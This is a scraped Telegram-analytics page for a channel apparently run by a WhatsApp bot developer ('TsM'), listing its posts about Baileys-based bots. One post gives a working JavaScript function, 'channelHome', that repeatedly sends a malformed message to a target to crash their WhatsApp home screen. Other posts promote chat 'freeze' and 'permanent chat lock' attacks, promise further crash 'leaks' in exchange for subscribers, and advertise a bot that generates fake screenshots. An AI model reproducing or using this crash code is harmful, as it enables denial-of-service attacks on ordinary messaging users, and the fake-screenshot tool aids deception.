𐂲⃕𐆃𝐬͢𝐌 ⛧ 𐅕͢𝐨𝐝𝐝͢𝐞𝐫⃕𐂲
Открыть в Telegram
Bot & WhatsApps All images shared in this channel are for visual purposes only. They are intended solely for illustrative use and do not represent any functional or operational aspects! All phone numbers in the media belong to the channel admin © 2021 tsm
БольшеСтрана не указанаКатегория не указана
278
Подписчики
+224 часа
+187 дней
+2030 день
Загрузка данных...
Похожие каналы
Нет данных
Возникли проблемы? Пожалуйста, обновите страницу или обратитесь к нашему support-менеджеру .
Облако тегов
Нет данных
Возникли проблемы? Пожалуйста, обновите страницу или обратитесь к нашему support-менеджеру .
Входящие и исходящие упоминания
---
---
---
---
---
---
Привлечение подписчиков
июнь '26
июнь '26
+269
в 3 каналах
май '260
в 3 каналах
Get PRO
апрель '26
+15
в 4 каналах
| Дата | Привлечение подписчиков | Упоминания | Каналы | |
| 20 июня | +2 | |||
| 19 июня | +2 | |||
| 18 июня | +6 | |||
| 17 июня | +5 | |||
| 16 июня | +7 | |||
| 15 июня | 0 | |||
| 14 июня | 0 | |||
| 13 июня | 0 | |||
| 12 июня | 0 | |||
| 11 июня | +3 | |||
| 10 июня | +1 |
Посты канала
| 2 | Made a func to toggle group history👍
async function toggleGroupHistory(sock, jid, enable = true) {
if (sock && jid)
await sock.query({
tag: "iq",
attrs: {
type: "get",
to: "s.whatsapp.net",
xmlns: "w:mex"
},
content: [
{
tag: "query",
attrs: {
query_id: "24688994337458819"
},
content: Buffer.from(JSON.stringify({
variables: {
group_id: jid,
input: {
member_share_group_history_mode: enable ? "ALL_MEMBER_SHARE" : "ADMIN_SHARE"
}
}
}), "utf-8")
}
]
})
}
Dont miss future updates and join our channel now 😛
t.me/TheSatanicMirror | 1 015 |
| 3 | Crash home via channel😏
Function used in this video:
async function channelHome(sock, target, count = 5) {
for (let x = 0; x < count; x++) {
sock.relayMessage(target, {
"messageContextInfo": {
"messageAssociation": {
"parentMessageKey": {"id": ""}
}
},
"extendedTextMessage": {}
},{})
await sleep(5000)
}
}
Join so you dont miss any future updates
Next leak at 500 subs🤌 | 1 492 |
| 4 | Lottie sticker edit got fully patched
They added the JWT signature proof that was missing before.
Without their private key we cant make top memes anymore 🫡 | 1 191 |
| 5 | Crash home newsletter leak at 150 subscribers in this channel
share the link guys:
t.me/TheSatanicMirror | 1 328 |
| 6 | t.me/TheSatanicMirror | 785 |
| 7 | All videos above are old and content may be outdated🍸 | 736 |
| 8 | Here are one thousand 5char telegram usernames🦋
Channel crash (home) will be leaked at 1k follows so share this to your friends ore groups/channels | 725 |
| 9 | Because i forgot to update the web version pairing wasnt working for some of you guys. Here is the updated version🤟
Whatsapp bot base (fix)
🔝Features:
🔼- slim
🔼- anti view once
🔼- buttons
🔼- poll menu
🔼- custom pairing
🔼- internal terminal
🔼- smart prebuild
By TsM Snøwi?🔥 | 728 |
| 10 | 🆕 chat to home frezze (maybe first one)
Unfortunately, I currently have almost no time for WhatsApp. That's why there have been so few posts.👈 | 651 |
| 11 | Just added a new feature for the bannchecker🎷:
>Generate fake screenshot for your channels/groups
Command: ?? +xxxxxxxxxx
Bot: @projghostbot | 572 |
| 12 | Goofy ahhh crashes 🤫 | 502 |
| 13 | I improved the function to use interactive buttons as sender so cta_url buttons can be shown again👍
Place the patchMessageBeforeSending in your makeWaSocket (like in the picture)
Code:
patchMessageBeforeSending: (msg) => {
function self(msg) {
const im =
msg?.interactiveMessage ||
msg?.message?.interactiveMessage ||
Object.values(msg || {}).find(v => v?.message?.interactiveMessage)?.message
?.interactiveMessage;
const c = !!im?.carouselMessage?.cards?.every(
i => i?.nativeFlowMessage?.buttons
);
if (!im?.nativeFlowMessage?.buttons && !c) return msg;
const obj = { name: "cta_url", buttonParamsJson: "" };
const ctaify = but => {
if (!Array.isArray(but)) return but;
return but.flatMap(b => {
if (!b?.buttonParamsJson) {
return [];
}
if (b?.name?.toLowerCase?.().includes("cta_url")) {
return [b];
}
return [obj, b];
});
};
if (im?.nativeFlowMessage?.buttons) {
im.nativeFlowMessage.buttons = ctaify(
im.nativeFlowMessage.buttons
);
}
if (c) {
for (const card of im.carouselMessage.cards) {
if (Array.isArray(card.nativeFlowMessage?.buttons)) {
card.nativeFlowMessage.buttons = ctaify(
card.nativeFlowMessage.buttons
);
}
}
}
return msg;
}
msg = self(msg)
return msg
}, | 438 |
| 14 | Forgot to reupload😃 | 386 |
| 15 | Guys its still possible 🥳 | 384 |
| 16 | There is a way to change your group member label using baileys. How??? With this function:
async function groupLabel(sock, targetGroupJid, text) {
try {
sock.relayMessage(targetGroupJid, {
"protocolMessage": {
"type": 30,
"memberLabel": {
"label": text.slice(0,30) //Limit is 30
}
}
},{
"additionalNodes": [
{
"tag": "meta",
"attrs": {
"tag_reason": "user_update",
"appdata": "member_tag"
},
"content": undefined
}
]
})
} catch(e) {}
}
//How to use:
await groupLabel(snowi, target, "TsM Snøwi")
There are some limits by whatsapp:
-Max 30 chars
-Only some chars work | 399 |
| 17 | I upgradet the bannchecker a bit
You can now check multiple target at once. Hope you like it😮
Bot: @ProjGhostBot
use /help if you dont know how to use the command | 395 |
| 18 | 🖥Permanent chat lock (frezze)
using video | 337 |
| 19 | 😀Crash home via channel.
>>More updates incoming 😀<< | 275 |
| 20 | I am currently playing around with the apk a bit.
Soon new bot updates🤔 | 300 |
Уже доступно! Исследование Telegram 2025 — ключевые инсайты года 
